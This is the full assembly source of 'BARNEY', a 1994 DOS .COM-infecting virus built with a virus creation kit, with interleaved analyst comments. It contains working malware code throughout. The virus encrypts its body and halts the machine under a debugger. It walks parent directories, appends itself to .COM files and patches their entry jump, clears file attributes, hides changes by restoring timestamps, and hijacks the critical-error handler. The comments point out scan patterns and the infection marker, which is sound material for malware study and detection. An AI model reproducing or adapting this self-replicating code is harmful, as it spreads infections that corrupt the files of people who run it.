Assembly Source File  |  1994-04-11  |  9KB  |  290 lines

  1. ; barney : BARNEY (c) by HypoDermic!! Part of the Mayberry Family!!!
  2. ; Created with Biological Warfare - Version 0.90ß by MnemoniX
  3.  
  4. PING            equ     0F92Fh                  ; marker word used by the stack re-read check in virus_code
  5. INFECT          equ     1                       ; per-run cap compared against the `infections` counter
  6.  
  7. code            segment
  8.                 org     100h                    ; .COM image: DOS loads it at offset 100h, after the PSP
  9.                 assume  cs:code,ds:code
  10.  
  11. start:
      ; Analysis note: 0E9h is the near JMP rel16 opcode; a displacement of 3 skips
      ; the three bytes at `host` and lands on virus_begin. In this build the host
      ; is only INT 20h (terminate) plus one pad byte.
  12.                 db      0E9h,3,0          ; to virus
  13. host:
      ; com_exit copies three bytes from [bp + host] back to offset 100h, so in an
      ; infected file this slot (the three bytes just before virus_begin) carries the
      ; host's original first three bytes.
  14.                 db      0CDh,20h,0        ; host program
  15. virus_begin:
      ; Decryptor stub. encrypt_code copies virus_begin..virus_code verbatim and
      ; XORs only what follows, so these instruction bytes stay in clear on disk.
      ; The only values encrypt_code rewrites per infection are the two 16-bit
      ; operands `code_offset` and `cipher`; the opcode bytes around them are
      ; constant, which makes the stub usable as a static scan pattern with those
      ; two words wildcarded.
  16.  
  17.                 mov     dx,VIRUS_SIZE / 2 + 1   ; DX = number of 16-bit words to XOR
  18.                 db      0BBh                    ; decryption module
      ; 0BBh is the MOV BX,imm16 opcode; the dw below is its operand, i.e. the
      ; run-time offset of virus_code inside the current host.
  19. code_offset     dw      offset virus_code
  20.  
  21. decrypt:
  22.                 db      02Eh,081h,37h           ; XOR CS:[BX]
      ; The dw below is the imm16 operand of that XOR, i.e. the key. It is 0 in
      ; this build, so the XOR is a no-op and the assembled image runs in clear.
  23. cipher          dw      0
  24.                 inc     bx                      ; advance one word (two INCs)
  25.                 inc     bx
  26.                 dec     dx
  27.                 jnz     decrypt                 ; falls through into virus_code when DX reaches 0
  28.  
  29.  
  30. virus_code:
      ; Main body (the XOR-encoded region starts here). Sequence: compute the
      ; delta offset in BP, run the stack re-read check, toggle the PIC mask bit,
      ; point the DTA at new_DTA, reset the counter, call traverse, then restore
      ; the DTA to 80h and fall through to com_exit.
      ;
      ; Delta offset: CALL pushes the address of the POP; subtracting the POP's
      ; assemble-time offset leaves BP = (run-time address - assembled address).
      ; Every later data reference is written as [bp + label] for that reason.
  31.                 call    $ + 3             ; BP is instruction ptr.
  32.                 pop     bp
  33.                 sub     bp,offset $ - 1
  34.  
  35.                 push    ds es
  36.  
      ; Stack re-read check: PING is pushed and popped, then SP is stepped back two
      ; bytes and the same slot is popped again into BX. If the slot was overwritten
      ; in between, AX != BX and execution reaches HLT with interrupts still
      ; disabled (CLI below, STI only at no_trace). Presumably the overwrite comes
      ; from a single-step tracer's interrupt frame on this stack (the author's
      ; comment calls it anti-trace). A hang right after launch under a debugger is
      ; the visible symptom.
  37.                 cli
  38.                 mov     ax,PING           ; mild anti-trace code
  39.                 push    ax
  40.                 pop     ax
  41.                 dec     sp
  42.                 dec     sp
  43.                 pop     bx
  44.                 cmp     ax,bx
  45.                 je      no_trace
  46.                 hlt
  47.  
  48. no_trace:
  49.                 sti
      ; Port 21h is the master PIC interrupt mask register; bit 1 masks IRQ1
      ; (keyboard). The bit is flipped and flipped back, so the mask ends unchanged.
  50.                 in      al,21h            ; lock out & reopen keyboard
  51.                 xor     al,2
  52.                 out     21h,al
  53.                 xor     al,2
  54.                 out     21h,al
  55.  
      ; INT 21h AH=1Ah: set the Disk Transfer Area to new_DTA so the find-first /
      ; find-next results do not overwrite the host's command tail at PSP:80h.
  56.                 lea     dx,[bp + offset new_DTA]
  57.                 mov     ah,1Ah
  58.                 int     21h
  59.  
  60.                 mov     byte ptr [bp + infections],0
  61.  
  62.                 call    traverse
  63.  
  64.                 pop     es ds
      ; Put the DTA back at offset 80h (the default DTA in the PSP) before the
      ; host gets control.
  65.                 mov     dx,80h
  66.                 mov     ah,1Ah
  67.                 int     21h
  68.  
  69. com_exit:
      ; Hands control back to the host: the three saved bytes at [bp + host] are
      ; copied to offset 100h (MOVSW + MOVSB = 3 bytes), undoing the patched jump
      ; in memory only. The 100h pushed here is the return address consumed by the
      ; final RET, so the host starts at its normal entry point.
  70.                 lea     si,[bp + host]          ; restore host program
  71.                 mov     di,100h
  72.                 push    di
  73.                 movsw
  74.                 movsb
  75.  
  76.                 call    fix_regs                ; fix up registers
  77.                 ret                             ; and leave
  78.  
  79. fix_regs:
      ; Resets general registers before the host runs: AX, BX, DX, DI and BP are
      ; zeroed and SI is set to 100h. CX is not touched here.
  80.                 xor     ax,ax
  81.                 cwd                             ; DX = sign extension of AX (0), so DX = 0
  82.                 xor     bx,bx
  83.                 mov     si,100h
  84.                 xor     di,di
  85.                 xor     bp,bp                   ; delta offset is no longer needed past this point
  86.                 ret
  87.  
  88.  
  89. traverse:
      ; Directory walk. Saves the current directory in a 64-byte stack buffer, calls
      ; infect_dir for the current directory, then repeatedly changes to ".." until
      ; either the counter reaches INFECT or the CHDIR fails (carry set), and finally
      ; changes back to the saved directory. Observable behaviour: *.COM files in
      ; the start directory and its ancestors are opened, the process's current
      ; directory changes during the run and is restored at the end.
  90.                 sub     sp,64                   ; allocate stack space
  91.                 mov     si,sp
  92.                 inc     si                      ; leave one byte in front for the leading '\'
  93.                 mov     ah,47h                  ; get current directory
  94.                 xor     dl,dl                   ; DL = 0 selects the default drive
  95.                 int     21h
  96.  
  97.                 dec     si
  98.                 mov     byte ptr ss:[si],'\' ; fix directory
  99.  
  100. next_dir:
  101.                 call    infect_dir
  102.  
  103.                 cmp     byte ptr [bp + infections],INFECT
  104.                 je      traverse_done           ; cap reached, stop walking upward
  105.  
  106.                 lea     dx,[bp + outer]         ; repeat in next dir up
  107.                 mov     ah,3Bh                  ; INT 21h AH=3Bh: change directory
  108.                 int     21h
  109.                 jnc     next_dir
  110.  
  111. traverse_done:
  112.                 add     sp,64                   ; reset
  113.                 mov     dx,si                   ; DX -> saved "\path" string
  114.                 mov     ah,3Bh
  115.                 int     21h
  116.                 ret
  117.  
  118. infect_dir:
      ; Enumerates files matching find_me ('*.COM') in the current directory with
      ; INT 21h AH=4Eh (find first) / AH=4Fh (find next) and passes each name to
      ; execute. Stops when the search is exhausted (carry set) or the counter
      ; equals INFECT. CX (the search attribute mask) is not set in this routine.
  119.                 mov     ah,4Eh
  120.                 lea     dx,[bp + find_me]
  121.                 int     21h
  122.                 jc      infect_done
  123.  
  124. next_file:
  125.                 lea     dx,[bp + new_DTA + 1Eh] ; offset 1Eh in the DTA = ASCIIZ name of the file found
  126.                 call    execute
  127.                 cmp     byte ptr [bp + infections],INFECT
  128.                 je      infect_done
  129.                 mov     ah,4Fh
  130.                 int     21h
  131.                 jnc     next_file
  132.  
  133. infect_done:
  134.                 ret
  135. execute:
      ; Per-file routine. In: DS:DX -> ASCIIZ file name (from the DTA), BP = delta.
      ; Analysis summary of the on-disk and system changes visible in this listing:
      ;   - the INT 24h vector is overwritten directly in the IVT at 0000:0090h;
      ;     no code in this listing puts the previous vector back;
      ;   - file attributes are cleared, then restored from the saved value;
      ;   - the file's date/time is read first and written back afterwards, so the
      ;     timestamp does not show the modification;
      ;   - a modified file grows by VIRUS_SIZE + 3 bytes and its first three bytes
      ;     become E9h + (original length as a 16-bit word);
      ;   - files whose first word is 'MZ' (EXE header) are skipped, as are files
      ;     longer than 65279 - (VIRUS_SIZE + 3) and files already carrying the marker.
      ; Marker test: length - (VIRUS_SIZE + 3) equals the word at file offset 1.
      ; The same relation can be used by a scanner to flag candidate files.
  136.                 push    si
  137.  
  138.                 xor     ax,ax                   ; critical error handler
  139.                 mov     es,ax                   ; routine - catch int 24
  140.                 lea     ax,[bp + int_24]
  141.                 mov     es:[24h * 4],ax
  142.                 mov     es:[24h * 4 + 2],cs
  143.  
  144.                 mov     ax,4300h                ; change attributes
  145.                 int     21h                     ; AX=4300h reads the attributes into CX
  146.  
  147.                 push    cx dx ds                ; saved attributes and name pointer, popped at `close`
  148.                 xor     cx,cx
  149.                 call    set_attributes          ; CX = 0 clears all attributes, read-only included
  150.  
  151.                 mov     ax,3D02h                ; open file
  152.                 int     21h
  153.                 jc      cant_open
  154.                 xchg    bx,ax                   ; BX = file handle for the calls below
  155.  
  156.                 mov     ax,5700h                ; save file date/time
  157.                 int     21h
  158.                 push    cx dx
  159.                 mov     ah,3Fh                  ; INT 21h AH=3Fh: read 28 bytes of the file head
  160.                 mov     cx,28
  161.                 lea     dx,[bp + read_buffer]
  162.                 int     21h
  163.  
  164.                 cmp     word ptr [bp + read_buffer],'ZM'
  165.                 je      dont_infect             ; .EXE, skip
  166.  
  167.                 mov     al,2                    ; move to end of file
  168.                 call    move_file_ptr           ; returns DX = file length (low word), AH = 40h, CX = 3
  169.  
  170.                 cmp     dx,65279 - (VIRUS_SIZE + 3)
  171.                 ja      dont_infect             ; too big, don't infect
  172.  
  173.                 sub     dx,VIRUS_SIZE + 3       ; check for previous infection
  174.                 cmp     dx,word ptr [bp + read_buffer + 1]
  175.                 je      dont_infect
  176.  
  177.                 add     dx,VIRUS_SIZE + 3       ; DX = file length again
  178.                 mov     word ptr [bp + new_jump + 1],dx
  179.  
  180.                 add     dx,103h                 ; length + 100h load offset + 3 saved bytes = run-time virus_begin
  181.                 call    encrypt_code            ; encrypt virus
  182.  
      ; AH = 40h and CX = 3 were preloaded by move_file_ptr and preserved by
      ; encrypt_code, so this INT 21h writes the three original head bytes at
      ; end of file (the slot com_exit later reads as `host`).
  183.                 lea     dx,[bp + read_buffer]   ; save original program head
  184.                 int     21h
  185.                 mov     ah,40h                  ; write virus to file
  186.                 mov     cx,VIRUS_SIZE
  187.                 lea     dx,[bp + encrypt_buffer]
  188.                 int     21h
  189.  
  190.                 xor     al,al                   ; back to beginning of file
  191.                 call    move_file_ptr           ; again returns AH = 40h, CX = 3
  192.  
  193.                 lea     dx,[bp + new_jump]      ; three-byte JMP written over the file head
  194.                 int     21h
  195.  
  196. fix_date_time:
  197.                 pop     dx cx
  198.                 mov     ax,5701h                ; restore file date/time
  199.                 int     21h
  200.  
  201.                 inc     byte ptr [bp + infections]
  202.  
  203. close:
  204.                 pop     ds dx cx                ; restore attributes
  205.                 call    set_attributes
  206.  
  207.                 mov     ah,3Eh                  ; close file
  208.                 int     21h
  209.  
  210. cant_open:
  211.                 pop     si
  212.                 ret
  213.  
  214.  
  215. set_attributes:
      ; INT 21h AX=4301h: set file attributes. In: DS:DX -> ASCIIZ name, CX = new
      ; attribute word. Called from execute once with CX = 0 and once with the
      ; value saved earlier.
  216.                 mov     ax,4301h
  217.                 int     21h
  218.                 ret
  219.  
  220. dont_infect:
      ; Skip path of execute (EXE header, size limit, or marker already present).
      ; Drops the two date/time words pushed after AX=5700h and rejoins at `close`,
      ; so attributes are still restored and the handle closed; the file is not written.
  221.                 pop     cx dx                   ; can't infect, skip
  222.                 jmp     close
  223.  
  224. move_file_ptr:
      ; INT 21h AH=42h seek with offset 0. In: AL = origin (execute passes 0 for
      ; start, 2 for end), BX = handle. Out: DX = low word of the new position,
      ; AH = 40h and CX = 3 preloaded so the caller's next INT 21h is a 3-byte write.
  225.                 mov     ah,42h                  ; move file pointer
  226.                 cwd                             ; AX is positive here (AH = 42h), so DX = 0
  227.                 xor     cx,cx                   ; CX:DX = 0 offset
  228.                 int     21h
  229.  
  230.                 mov     dx,ax                   ; set up registers
  231.                 mov     ah,40h
  232.                 mov     cx,3
  233.                 ret
  234.  
      ; Both strings sit after virus_code, inside the range encrypt_code XORs, so in
      ; a file written by execute they are normally not present as plain text. They
      ; are readable in this first-generation image (cipher = 0) and in memory after
      ; the stub has run. Nothing in this listing prints them.
  235. courtesy_of     db      '[BW]',0
  236. signature       db      'BARNEY (c) by HypoDermic!! Part of the Mayberry Family!!!',0
  237.  
  238.  
  239. encrypt_code:
      ; Builds the copy that execute writes to disk. In: DX = run-time offset that
      ; virus_begin will have in the target file, BP = delta. AX and CX are
      ; preserved for the caller (execute relies on AH = 40h / CX = 3).
      ; Encoding: a single 16-bit XOR key taken from the low word of the BIOS tick
      ; count (INT 1Ah AH=0 returns it in DX). The key is stored in clear as the
      ; `cipher` operand inside the stub, so the body can be decoded for analysis
      ; straight from an infected file.
  240.                 push    ax cx
  241.  
  242.                 push    dx
  243.                 xor     ah,ah                   ; get time for random number
  244.                 int     1Ah
  245.  
  246.                 mov    [bp + cipher],dx         ; key patched into the live stub before it is copied
  247.                 pop     cx                      ; CX = DX passed in by the caller
  248.                 add     cx,virus_code - virus_begin
  249.                 mov     [bp + code_offset],cx   ; MOV BX operand = run-time offset of virus_code in the target
  250.                 push    cs                      ; ES = CS
  251.                 pop     es
  252.  
      ; Stub (virus_begin..virus_code) is copied unmodified.
  253.                 lea     si,[bp + virus_begin]
  254.                 lea     di,[bp + offset encrypt_buffer]
  255.                 mov     cx,virus_code - virus_begin
  256.                 rep     movsb
  257.  
      ; SI now points at virus_code; the rest is XORed word by word into the buffer.
  258.                 mov     cx,VIRUS_SIZE / 2 + 1
  259. encrypt:
  260.                 lodsw                           ; encrypt virus code
  261.                 xor     ax,dx
  262.                 stosw
  263.                 loop    encrypt
  264.  
  265.                 pop     cx ax
  266.                 ret
  267.  
  268.  
  269. find_me         db      '*.COM',0              ; search mask passed to find-first in infect_dir
  270. outer           db      '..',0                 ; parent-directory name passed to CHDIR in traverse
  271.  
  272. int_24:
      ; Replacement DOS critical-error handler installed by execute. Returning
      ; AL = 3 tells DOS to fail the call, so no Abort/Retry/Fail prompt appears
      ; (for example on a write-protected disk). The handler saves no registers and
      ; does not chain to the previous handler.
  273.                 mov     al,3                    ; int 24 handler
  274.                 iret
  275. new_jump        db      0E9h,0,0                ; JMP rel16 template; execute fills in the operand word
  276.  
  277. infections      db      0                       ; files modified in this run, compared against INFECT
  278. virus_end:
      ; Everything from virus_begin up to this label is what execute writes out
      ; (VIRUS_SIZE bytes). The buffers below are declared uninitialised ("?")
      ; scratch space and are not part of that length.
  279. VIRUS_SIZE      equ     virus_end - virus_begin
  280. read_buffer     db      28 dup (?)              ; read buffer
  281. new_DTA         db      128 dup(?)              ; private DTA used during the file search
  282. encrypt_buffer  db      VIRUS_SIZE dup (?)      ; encryption buffer
  283.  
  284. end_heap:
  285.  
  286. MEM_SIZE        equ     end_heap - start        ; defined but not referenced elsewhere in this listing
  287.  
  288. code            ends
  289.                 end     start
  290.